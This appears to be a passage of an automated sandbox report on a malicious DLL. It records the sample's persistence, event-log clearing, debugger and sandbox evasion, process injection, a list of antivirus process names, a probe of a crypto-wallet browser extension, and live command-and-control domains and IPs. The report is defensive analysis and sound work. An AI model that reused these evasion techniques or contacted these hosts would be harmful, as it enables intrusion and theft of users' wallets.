Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?SetDisablePrintScreen@@YAXH@ZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe C:\Users\user\Desktop\Hkeyboard.dll,?UnInstallKBHook@@YAHXZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?InstallKBHook@@YAHXZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?SetDisablePrintScreen@@YAXH@ZJump to behavior
Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",?UnInstallKBHook@@YAHXZJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\dllhost.exe dllhost.exeJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\loaddll32.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: napinsp.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: pnrpnsp.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wshbth.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: nlaapi.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: winrnr.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeSection loaded: wldp.dllJump to behavior
Source: Hkeyboard.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: Hkeyboard.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: Hkeyboard.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: Hkeyboard.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Hkeyboard.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: Hkeyboard.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: Hkeyboard.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
Source: Hkeyboard.dllStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: C:\Users\Administrator\source\repos\sn-15\Release\sn-15.pdb source: rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dll
Source: Hkeyboard.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: Hkeyboard.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: Hkeyboard.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: Hkeyboard.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: Hkeyboard.dllStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC4D60 _memset,_memset,_memset,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegQueryValueExA,lstrcpyA,lstrcpyA,wsprintfA,FreeLibrary,3_2_04EC4D60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EB5D25 push ecx; ret 3_2_04EB5D38
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04ED4FFD push ecx; ret 3_2_04ED5010
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04ECBFC0 push eax; ret 3_2_04ECBFC1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04ECF1B8 push eax; ret 3_2_04ECF219
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04ECF268 push eax; ret 3_2_04ECF219
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0490B1 push ecx; ret 3_2_6D0490C4
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_03295A45 push ecx; ret 8_2_03295A58
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04165D25 push ecx; ret 11_2_04165D38
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0417BFC0 push eax; ret 11_2_0417BFC1
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04184FFD push ecx; ret 11_2_04185010
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0417F1B8 push eax; ret 11_2_0417F219
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_0417F268 push eax; ret 11_2_0417F219

Boot Survival

barindex
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run proxifer.updateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run proxifer.updateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run proxifer.updateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run rolyer.updateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run rolyer.updateJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC58D0 OpenEventLogA,OpenEventLogA,ClearEventLogA,CloseEventLog,3_2_04EC58D0
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-83482
Source: C:\Windows\SysWOW64\dllhost.exeStalling execution: Execution stalls by calling Sleepgraph_8-13288
Source: C:\Windows\SysWOW64\rundll32.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_3-84993
Source: C:\Windows\SysWOW64\dllhost.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_8-13495
Source: C:\Windows\SysWOW64\dllhost.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_8-11758
Source: C:\Windows\SysWOW64\rundll32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_3-83528
Source: C:\Windows\SysWOW64\rundll32.exeAPI coverage: 3.7 %
Source: C:\Windows\SysWOW64\dllhost.exe TID: 7264Thread sleep time: -240000s >= -30000sJump to behavior
Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0668DA FindFirstFileExW,3_2_6D0668DA
Source: C:\Windows\System32\loaddll32.exeThread delayed: delay time: 120000Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeThread delayed: delay time: 60000Jump to behavior
Source: dllhost.exe, 00000008.00000002.4691549539.00000000032FB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll"
Source: rundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000004.00000002.2239587139.000000000302A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-83673
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-83468
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_3-84503
Source: C:\Windows\SysWOW64\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_8-11759
Source: C:\Windows\SysWOW64\rundll32.exeAPI call chain: ExitProcess graph end nodegraph_11-24917
Source: C:\Windows\SysWOW64\dllhost.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Source: C:\Windows\SysWOW64\rundll32.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_3-84501
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EB21EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_04EB21EB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC48A0 OutputDebugStringA,ExitProcess,GetModuleFileNameA,_memset,_memset,_sprintf,lstrlenA,__time64,__localtime64,_memset,wsprintfA,CreateMutexA,GetLastError,ExitProcess,CreateThread,WaitForSingleObject,CloseHandle,wsprintfA,CoUninitialize,3_2_04EC48A0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC4D60 _memset,_memset,_memset,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,RegOpenKeyExA,RegQueryValueExA,lstrcpyA,lstrcpyA,wsprintfA,FreeLibrary,3_2_04EC4D60
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EFE3AD mov eax, dword ptr fs:[00000030h]3_2_04EFE3AD
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032B73AD mov eax, dword ptr fs:[00000030h]8_2_032B73AD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_041AE3AD mov eax, dword ptr fs:[00000030h]11_2_041AE3AD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EBEC24 __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,3_2_04EBEC24
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EB21EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_04EB21EB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EB5ABF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_04EB5ABF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D049B8A IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D049B8A
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D04FADC IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_6D04FADC
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D0495EA SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_6D0495EA
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032957E6 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_032957E6
Source: C:\Windows\SysWOW64\dllhost.exeCode function: 8_2_032920E4 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_032920E4
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_041621EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,11_2_041621EB
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 11_2_04165ABF _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_04165ABF

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 104.21.40.214 443Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 81.31.208.36 8081Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\SysWOW64\dllhost.exe base: 3290000 protect: page execute and read and writeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EB2000 _memset,CreateProcessA,Wow64GetThreadContext,VirtualAllocEx,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,CloseHandle,CloseHandle,CloseHandle,3_2_04EB2000
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 3290000 value starts with: 4D5AJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\SysWOW64\dllhost.exe base: 3290000Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Hkeyboard.dll",#1Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\dllhost.exe dllhost.exeJump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D062DFA
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_6D06B929
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6D06B800
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,3_2_6D06BB05
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6D06BA2F
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D06B522
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,3_2_6D06B5AD
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D06B43C
Source: C:\Windows\SysWOW64\rundll32.exeCode function: EnumSystemLocalesW,3_2_6D06B487
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetACP,IsValidCodePage,GetLocaleInfoW,3_2_6D06B190
Source: C:\Windows\SysWOW64\rundll32.exeCode function: GetLocaleInfoW,3_2_6D06B395
Source: C:\Windows\SysWOW64\rundll32.exeCode function: ?SetDisablePrintScreen@@YAXH@Z,GetLocaleInfoW,3_2_6D0633BD
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EBA4BF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_04EBA4BF
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EB8827 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,3_2_04EB8827
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_04EC3970 _memset,GetVersionExA,_strncpy,3_2_04EC3970
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: avcenter.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: kxetray.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: avp.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: 360tray.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: rtvscan.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: ashDisp.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: TMBMSRV.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: AYAgent.aye
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: QUHLPSVC.EXE
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: RavMonD.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Mcshield.exe
Source: rundll32.exe, rundll32.exe, 0000000B.00000002.2296201390.0000000004160000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: K7TSecurity.exe

Stealing of Sensitive Information

barindex
Source: C:\Windows\SysWOW64\rundll32.exeFile queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\Jump to behavior
Source: C:\Windows\SysWOW64\dllhost.exeFile queried: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nkbihfbeogaeaoehlefnkodbefgpgknn\Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D01BDE0 socket,socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,accept,send,recv,WSAGetLastError,closesocket,closesocket,closesocket,closesocket,closesocket,3_2_6D01BDE0
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D02EF49 bind,WSAGetLastError,3_2_6D02EF49
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D036760 ?UnInstallKBHook@@YAHXZ,htons,htons,htons,bind,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError,3_2_6D036760
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D028100 _strncpy,?UnInstallKBHook@@YAHXZ,getsockname,WSAGetLastError,WSAGetLastError,WSAGetLastError,htons,WSAGetLastError,bind,WSAGetLastError,getsockname,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,htons,3_2_6D028100
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6D02F180 bind,WSAGetLastError,3_2_6D02F180
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
OS Credential Dumping2
System Time Discovery
1
Exploitation of Remote Services
12
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
Data Encrypted for Impact
CredentialsDomainsDefault AccountsScheduled Task/Job11
Registry Run Keys / Startup Folder
511
Process Injection
2
Obfuscated Files or Information
LSASS Memory1
File and Directory Discovery
Remote Desktop Protocol1
Data from Local System
21
Encrypted Channel
Exfiltration Over Bluetooth1
System Shutdown/Reboot
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)11
Registry Run Keys / Startup Folder
1
DLL Side-Loading
Security Account Manager23
System Information Discovery
SMB/Windows Admin Shares3
Clipboard Data
1
Non-Standard Port
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook111
Virtualization/Sandbox Evasion
NTDS141
Security Software Discovery
Distributed Component Object ModelInput Capture2
Non-Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script511
Process Injection
LSA Secrets111
Virtualization/Sandbox Evasion
SSHKeylogging3
Application Layer Protocol
Scheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
Rundll32
Cached Domain Credentials2
Process Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
Indicator Removal
DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1578296 Sample: Hkeyboard.dll Startdate: 19/12/2024 Architecture: WINDOWS Score: 100 38 www.dj5a2sbj.icu 2->38 40 api.mods4ws.me 2->40 52 Suricata IDS alerts for network traffic 2->52 54 Sigma detected: Dllhost.EXE Execution Anomaly 2->54 56 AI detected suspicious sample 2->56 8 loaddll32.exe 1 2->8         started        10 rundll32.exe 2->10         started        12 rundll32.exe 2->12         started        14 rundll32.exe 2->14         started        signatures3 process4 process5 16 rundll32.exe 3 1 8->16         started        20 cmd.exe 1 8->20         started        22 rundll32.exe 8->22         started        24 5 other processes 8->24 dnsIp6 32 81.31.208.36, 49736, 8081 PERMANETASIE Ireland 16->32 34 www.dj5a2sbj.icu 104.21.40.214, 443, 49725, 49726 CLOUDFLARENETUS United States 16->34 36 127.0.0.1 unknown unknown 16->36 44 System process connects to network (likely due to code injection or exploit) 16->44 46 Found evasive API chain (may stop execution after checking mutex) 16->46 48 Found API chain indicative of debugger detection 16->48 50 6 other signatures 16->50 26 dllhost.exe 16->26         started        30 rundll32.exe 20->30         started        signatures7 process8 dnsIp9 42 api.mods4ws.me 103.252.117.185, 49742, 49806, 49869 ICENET-AS-ININFONETCOMMENTERPRISESIN India 26->42 58 Found stalling execution ending in API Sleep call 26->58 60 Tries to access browser extension known for cryptocurrency wallets 26->60 62 System process connects to network (likely due to code injection or exploit) 30->62 signatures10

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
Hkeyboard.dll3%ReversingLabsWin32.Dropper.Generic
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://www.dj5a2sbj.icu/yj/update.xmlsecur32.dll0%Avira URL Cloudsafe
https://www.dj5a2sbj.icu/yj/update.xml0%Avira URL Cloudsafe
https://www.dj5a2sbj.icu/yj/update.xmlVirtualProtectVirtualAllocwinosX0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
www.dj5a2sbj.icu
104.21.40.214
truetrue
    unknown
    api.mods4ws.me
    103.252.117.185
    truefalse
      unknown
      NameMaliciousAntivirus DetectionReputation
      https://www.dj5a2sbj.icu/yj/update.xmltrue
      • Avira URL Cloud: safe
      unknown
      NameSourceMaliciousAntivirus DetectionReputation
      https://curl.se/docs/hsts.htmlrundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllfalse
        high
        https://curl.se/docs/alt-svc.html#rundll32.exefalse
          high
          https://www.dj5a2sbj.icu/yj/update.xmlsecur32.dllrundll32.exe, 00000003.00000002.4691583091.00000000034CA000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://curl.se/docs/http-cookies.html#rundll32.exefalse
            high
            https://curl.se/docs/alt-svc.htmlrundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllfalse
              high
              https://curl.se/docs/http-cookies.htmlrundll32.exe, rundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllfalse
                high
                https://curl.se/docs/hsts.html#rundll32.exefalse
                  high
                  https://www.dj5a2sbj.icu/yj/update.xmlVirtualProtectVirtualAllocwinosXrundll32.exe, 00000003.00000002.4692377003.000000006D070000.00000002.00000001.01000000.00000003.sdmp, rundll32.exe, 0000000B.00000002.2296680930.000000006D070000.00000002.00000001.01000000.00000003.sdmp, Hkeyboard.dllfalse
                  • Avira URL Cloud: safe
                  unknown
                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs
                  IPDomainCountryFlagASNASN NameMalicious
                  103.252.117.185
                  api.mods4ws.meIndia
                  134032ICENET-AS-ININFONETCOMMENTERPRISESINfalse
                  104.21.40.214
                  www.dj5a2sbj.icuUnited States
                  13335CLOUDFLARENETUStrue
                  81.31.208.36
                  unknownIreland
                  48142PERMANETASIEtrue
                  IP
                  127.0.0.1
                  Joe Sandbox version:41.0.0 Charoite
                  Analysis ID:1578296
                  Start date and time:2024-12-19 14:47:08 +01:00
                  Joe Sandbox product:CloudBasic
                  Overall analysis duration:0h 8m 39s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Cookbook file name:default.jbs
                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                  Number of analysed new started processes analysed:31
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Sample name:Hkeyboard.dll
                  Detection:MAL
                  Classification:mal100.spyw.evad.winDLL@23/1@2/4
                  EGA Information:
                  • Successful, ratio: 100%
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 93
                  • Number of non-executed functions: 302
                  Cookbook Comments:
                  • Found application associated with file extension: .dll
                  • Override analysis time to 240s for rundll32
                  • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WMIADAP.exe, SIHClient.exe, backgroundTaskHost.exe, svchost.exe
                  • Excluded IPs from analysis (whitelisted): 20.231.128.66, 20.31.169.57, 13.107.246.63, 104.126.37.184, 172.202.163.200, 150.171.27.10, 2.16.158.32, 23.218.208.109, 20.199.58.43
                  • Excluded domains from analysis (whitelisted): www.bing.com, fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, login.live.com, tse1.mm.bing.net, ctldl.windowsupdate.com, g.bing.com, arc.msn.com, fe3cr.delivery.mp.microsoft.com
                  • Not all processes where analyzed, report is missing behavior information
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size exceeded maximum capacity and may have missing disassembly code.
                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                  • VT rate limit hit for: Hkeyboard.dll
                  TimeTypeDescription
                  08:48:19API Interceptor1x Sleep call for process: loaddll32.exe modified
